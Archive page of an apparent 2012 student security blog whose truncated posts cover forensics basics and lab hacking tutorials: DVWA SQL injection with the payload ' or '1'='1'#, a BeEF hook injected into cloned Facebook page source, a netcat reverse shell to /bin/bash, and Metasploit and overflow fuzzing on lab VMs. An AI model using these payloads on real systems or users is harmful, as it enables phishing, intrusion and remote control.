Encryption of Mind: 2012

Minggu, 18 Maret 2012

Magic Numbers

Magic numbers are common in programs across many operating systems. Magic numbers implement strongly typed data and are a form of in-band signaling to the controlling program that reads the data type(s) at program run-time. Many files have such constants that identify the contained data. Detecting such constants in files is a simple and effective way of distinguishing between many file formats and can yield further run-time information.

Example:

GIF image files have the ASCII code for "GIF89a" (47 49 46 38 39 61) or "GIF87a" (47 49 46 38 37 61)

PDF files start with "%PDF" (hex 25 50 44 46).

"jpeg" File Structure

JPEG (Joint Photographic Experts Group) refers to a standards organization, a method of file compression.File Interchange Format (JFIF) is a development of C-Cube Microsystems for the purpose of storing JPEG-encoded data. JFIF is designed to allow files containing JPEG-encoded data streams to be exchanged between otherwise incompatible systems and applications.

A JFIF file is basically a JPEG data stream with a few restrictions and an identfying marker. In order to understand the JFIF format, you'll need to understand JPEG

Unallocated Space

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.

Examples.

If the operating system writes a file to a certain space on the hard drive that part of the drive is now “allocated”, as the file is using it the space, and no other files can be written to that section. If that file is deleted then that part of the hard drive is no longer required to be “allocated” it becomes unallocated. This means that new files can now be re-written to that location.

Slack Space

Slack space or sometimes referred to as file slack is the areabetween the end of a file and end of the last cluster or sector used by the file in question. Area is an area that will not be used again tostore the information there, so the area is "wasted" useless. Slackspace is common in file systems that use a large cluster size, while the file system that uses a small cluster size can organize the storage media more effectively and efficiently. Amount of wasted disk space can be thought is estimated by multiplying the number offiles (including the number of directories) with half the size of acluster. For example, a 10 000 personal computer that stores files in a file system that uses a cluster size of 4 kilobytes will haveapproximately 10 000 x 2 MB ~ = 20000 KB. On a large file server,slack space and even reached the size of tens of gigabytes.

Structure File system

File system is a logical structure that is used to control access to data on the disk. File system functions to provide a mechanism for storing data and programs are owned by the operating system and all users of computer systems.There are two parts to the file system, namely:A. Collection of files each of which stores data related.2. Directory structure to organize and provide information on all files in the system.All operating systems from DOS, Windows, Macintosh and UNIX derivative has its own file system to put the files in a hierarchical structure. Examples of file systems including FAT, NTFS, HFS and HFS +, EXT2, EXT3, ISO 9660, ODS-5, and UDF. Some file systems also include journaling file system or a versioning file system, file system also determines the file naming convention and the laying of the file in the directory structure.Here is a third type of naming files on a Windows system:

MBR is a special room and a very important presence in the hard disk. master boot record is created automatically when you create the first partition diharddisk.

MBR is a very important data structure that contains the partition table and a number of executable code for the boot start (way to hard to make loading the operating system). location is always on the first disk sector.

DVWA Advanced Hacking

okay first time

run our mysql & apache server than type 192.168.43.1/dvwa. than enter will open dvwa.

Improvement about Metasploit and beEf

fires step

run our beEf

copy http://127.0.0.1/beef/ link to open beef interface.

use metasploit and beef

oke first step
just take source code from facebook.com than put <script src='http://127.0.0.1/beef/hook/beefmagic.js.php'></script> on scrip than source code using .html.

What is Social Engenering and Social Engenering Toolkit

Social engineering

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, and scareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.

Examples of the Use of Auxiliary Tools.

a Metasploit module that is not an exploit is an auxiliary module, which leaves a lot to the imagination.

okay this time open msfconsole on terminal wait until msf opened, than type show auxiliary than press tab on keyboard than see result.

What is MSFpayload & MSFencode and Implemantation

Msfpayload :

Msfpayload is one of the many great tools included with theMetasploit Framework. It can be used to create customized payloads.To run Msfpayload, first select one of the many payloads included inthe framework. Then provide the parameters for the payload and theoutput format you want it to generate, and it will create acustomized payload for you. You can take the resulting file andinclude it in your own exploits written in C, Ruby, Perl, Java orother languages. It also has the ability to create executableprograms. These

EXploit Linux Stack Overflow

let's do it's.

first step

before exploit we must turn off the 'linux ASLR'

i try to see ASLR.

type : cat /proc/sys/kernel/randomize_va_space

Exploit Easy Chat Server (SEH & SafeSEH)

oke now we try to exploit Easy Chat Server.

first step

using wireshark for see vulner on Easy Chat Server. after we get a vulner make fuzzer for see how it's can be overflow. for take a header first step register and than we can see result on wireshare

Exploit BigAnt (SEH and SafeSEH)

now we try to exploit BigAnt

BigAnt has a protection on the SEH and safeSEH.

Direct Return Exploit(3) vuplayer

oke this time wanna try to exploit vuplayer

first step

patterns of attack.

In this time wanna try to see it's can be buffer overflow. a make on notepad try too write character "a" so much. if it's crash we can see it's can be overflow.

when it's witten, i try too save it using format wax. "spirit.wax. and i open spirit.wax using VUPlayer.

Direct Return Exploit(2) Mini-streamRM-MP3Converter

oke now we try to exploit Mini-streamRM-MP3Converter.

first step

make fuzzer for make an error.

until we now an error mini stremer(when we load it's lose) that mean we have make it's an error.

Install warFTP on Windows xp sp2

Oke for install warFTP 1.65
Download warFTP you can search at google.
than now double klik warFTP 1.65 and it's will be extract warFTP. you can see below

Direct Return Exploit(1) FTP Server on Windows sp xp3

oke now we will try to exploit FTP server on winodws sp xp2. before we try prepare requirements for exploitation.
1. Dowload WarFTP
2. Download ollyDbg
3. Fuzzer
if already prepared all the needs now install WarFTP an ollyDbg on your windows.

first steep
Open your FTP Server and press
propertis - start service

Structure of the Memory Registers

Before understanding more about the Structure of the Memory Registers. to better understand what we know dl is memory and what it registers.

What is memory?
Memory is the storage place various forms of information as binary numbers. The information will not be resolved binary form (encoded) by the number of instructions that turns it into a sequence of numbers or figures. For example: The letter F is stored as a decimal number 70 (or binary) using one method of solving. More complex instructions that can be used to store pictures, sound, video, and various kinds of information. The information can be stored in a single sell is called a byte.

Instaling ollyDbg on windows sp xp3

For instaling olybdg is so eazy.
first donwload olyDbg Download olyDbg

so open your download where it's put. so extraxt ollyDbg

Debugger is the software used to test and "debug" code. an application for analyzing debugger. For each module (executable or DLL file) try to separate code from data, identify the procedure, look for strings that are embedded and switch tables, determining the loop and the switch, find the function call and decode their arguments, and even predict the value of the register app.

If you need to see where the error occurred in a piece of code that you have recently compiled, then you can run it through a debugger to find problems. There are plenty of software out there that could be considered a debugger, but they do not go into details of the same depth as the second did.

Assignment of Information Gathering

Download here

Description about mkFIFO

mkfifo makes a FIFO special file with name pathname. mode specifies the FIFO's permissions. It is modified by the process's umask in the usual way: the permissions of the created file are (mode & ~umask).
A FIFO special file is similar to a pipe, except that it is created in a different way. Instead of being an anonymous communications channel, a FIFO special file is entered into the file system by calling mkfifo.

Once you have created a FIFO special file in this way, any process can open it for reading or writing, in the same way as an ordinary file. However, it has to be open at both ends simultaneously before you can proceed to do any input or output operations on it. Opening a FIFO for reading normally blocks the file until some other process opens the same FIFO for writing, and vice versa. See fifo(4) for non-blocking handling of FIFO special files.

mkfifo() is vulnerable to classic TOCTOU attacks.

A call to mkfifo() should be flagged if the first argument (the file name) is used previously in a check.

Exploit DVWA using sql injection

first steep
running your apache & mysql
so type localhost/dwva ant it will open new web page about dwva

and now
login
user : admin
pass : password

google hacking is one technique used in the hacking world by utilizing the ability of Google to search for an information ranging from the mundane to the information is very important information contained in the database search engine. because search engines like google is using a software called spiders or crawlers that have the task to trace any existing web pages and information on the worldwide web is stored on the internal server google itself. Then do the indexing, so for those who need information on something just enter any keywords (keywords) so that the information seeking process becomes easier. This is what the life of the hackers to get his victims. In fact, not infrequently of information such as passwords, credit card numbers, account numbers, and confidential information that should be the owner can be determined through search engines like google it.

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using various filters. Some also describe it as a container scanner banners directory or search engine. (Banners)Web search engines, like Google and Bing, which is great for finding your website. But what if you are interested in finding a computer to run certain parts of the software (like Apache)? Or if you want to know the version of Microsoft's IIS is the most popular? Or you want to see how many anonymous FTP server there? Maybe new vulnerabilities emerge and you want to see how many hosts it can infect?So, what's Shodan index?Most of the data taken from the 'banner', which is the meta-data server sends back to the client. This can be information about the server software, support service options, a welcome message or whatever the client wants to know before interacting with the server.

What is Tor and The Proxy Chain

Tor Definition

Tor is a virtual tunnel that allows it to hide our identity for surfing the internet.

and also i get definition from http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29

Tor (short for The onion router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", back to the user^[5] and is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored.

Bypass localhost/fbip

first steep

runnig service apache & mysql
open your browser and write on url localhost/fbip

second steep
now we try make an error of this site type ' or '1'='1'#

Revision about Put Cymothoa Using nc On Ubuntu.

first step
open your terminal and type root@bt: nc -l -v -p 1010
root@bt:~# nc -l -v -p 1010

it's still process a listening
now ope our ubuntu so open terminal and type : nc 192.168.43.1 1010 -e /bin/bash

than now back to terminal backtrack and see process of listenning.
root@bt:~# nc -l -v -p 1010
listening on [any] 1010 ...
192.168.43.130: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.43.1] from (UNKNOWN) [192.168.43.130] 36426

Cracking Pass Using Jhon The Ripper

this is tutorial continued from privilege escalation where we have got pass are still encrypted.

after we had gotten pass from privilege escalation copy that file to paste one of editor like gedit or nano and save it.

now type command for encryption.

Privilege Escalation

first steep

Gathering Infomation & service enemuration

target using ip 192.168.0.21

scanning using

zenmap & netifera

using zenmap

using netifera

Exploitation windows xp using metasploit

first steep

Information gathering & service enumeration

scan network 192.168.43.0/24 using nmap

root@bt:~# nmap -sP 192.168.43.0/24

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:09 WIT
Nmap scan report for 192.168.43.1
Host is up.
Nmap scan report for 192.168.43.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Nmap scan report for 192.168.43.254
Host is up (0.00077s latency).
MAC Address: 00:50:56:F8:58:F4 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.87 seconds

scanning vulnerability using nessus and how to exploit useing exploitdb

scaning vulnerability using nessus

first steep

starting nessus using console type /etc/init.d/nessusd start
root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

second steep
open browser and type localhost:8834 it will open nessus scaning and login by your user and your password.

press login
press scan - add and will open as shown below.

Gathering infomation about 3 website

at this second meeting is gathering information on the following 3 websites:

http://is2c-dojo.com/

passive gathering information

root@bt:~# whois is2c-dojo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: IS2C-DOJO.COM
   Registrar: CV. JOGJACAMP
   Whois Server: whois.resellercamp.com
   Referral URL: http://www.resellercamp.com
   Name Server: NS1.PARTNERIT.US
   Name Server: NS2.PARTNERIT.US
   Status: clientTransferProhibited
   Updated Date: 14-jan-2012
   Creation Date: 14-jan-2012
   Expiration Date: 14-jan-2013

gattering information about localhost & website

first steep

see our ip address.

dhclient eth0

There is already a pid file /var/run/dhclient.pid with pid 4219

killed old client process, removed PID file

Internet Systems Consortium DHCP Client V3.1.3

For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/eth0/00:26:22:73:84:f3

Sending on LPF/eth0/00:26:22:73:84:f3

Sending on Socket/fallback

DHCPREQUEST of 192.168.0.24 on eth0 to 255.255.255.255 port 67

DHCPACK of 192.168.0.24 from 192.168.0.40

bound to 192.168.0.24 -- renewal in 292629 seconds.

first steep
download nessus on this website
http://www.nessus.org/products/nessus/nessus-download-agreement
on that link press aggre so donwload
Nessus-4.4.1-debian5_i386.deb

after you donwload nessus.
opern your termial for install nessus.
type

Configuration network Backtrack , ubuntu, dan Windows xp sp3

first step
open terminal at backtrack as host
type "ifconfig".

from this info we now that have configure about ethernet to virtualbox
1. vmnet1
vmnet1    Link encap:Ethernet HWaddr 00:50:56:c0:00:01
          inet addr:192.168.43.1 Bcast:192.168.43.255 Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fec0:1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

install ubuntu 10.10 on virtualbox

step for create ubuntu 10.10 on backtrack same way in windows create.
you can see here
http://scx010c073.blogspot.com/2012/01/install-winodows-xp-on-virtualbox.html

now we gonna install ubuntu 10.10 on virualbox

first booting ubuntu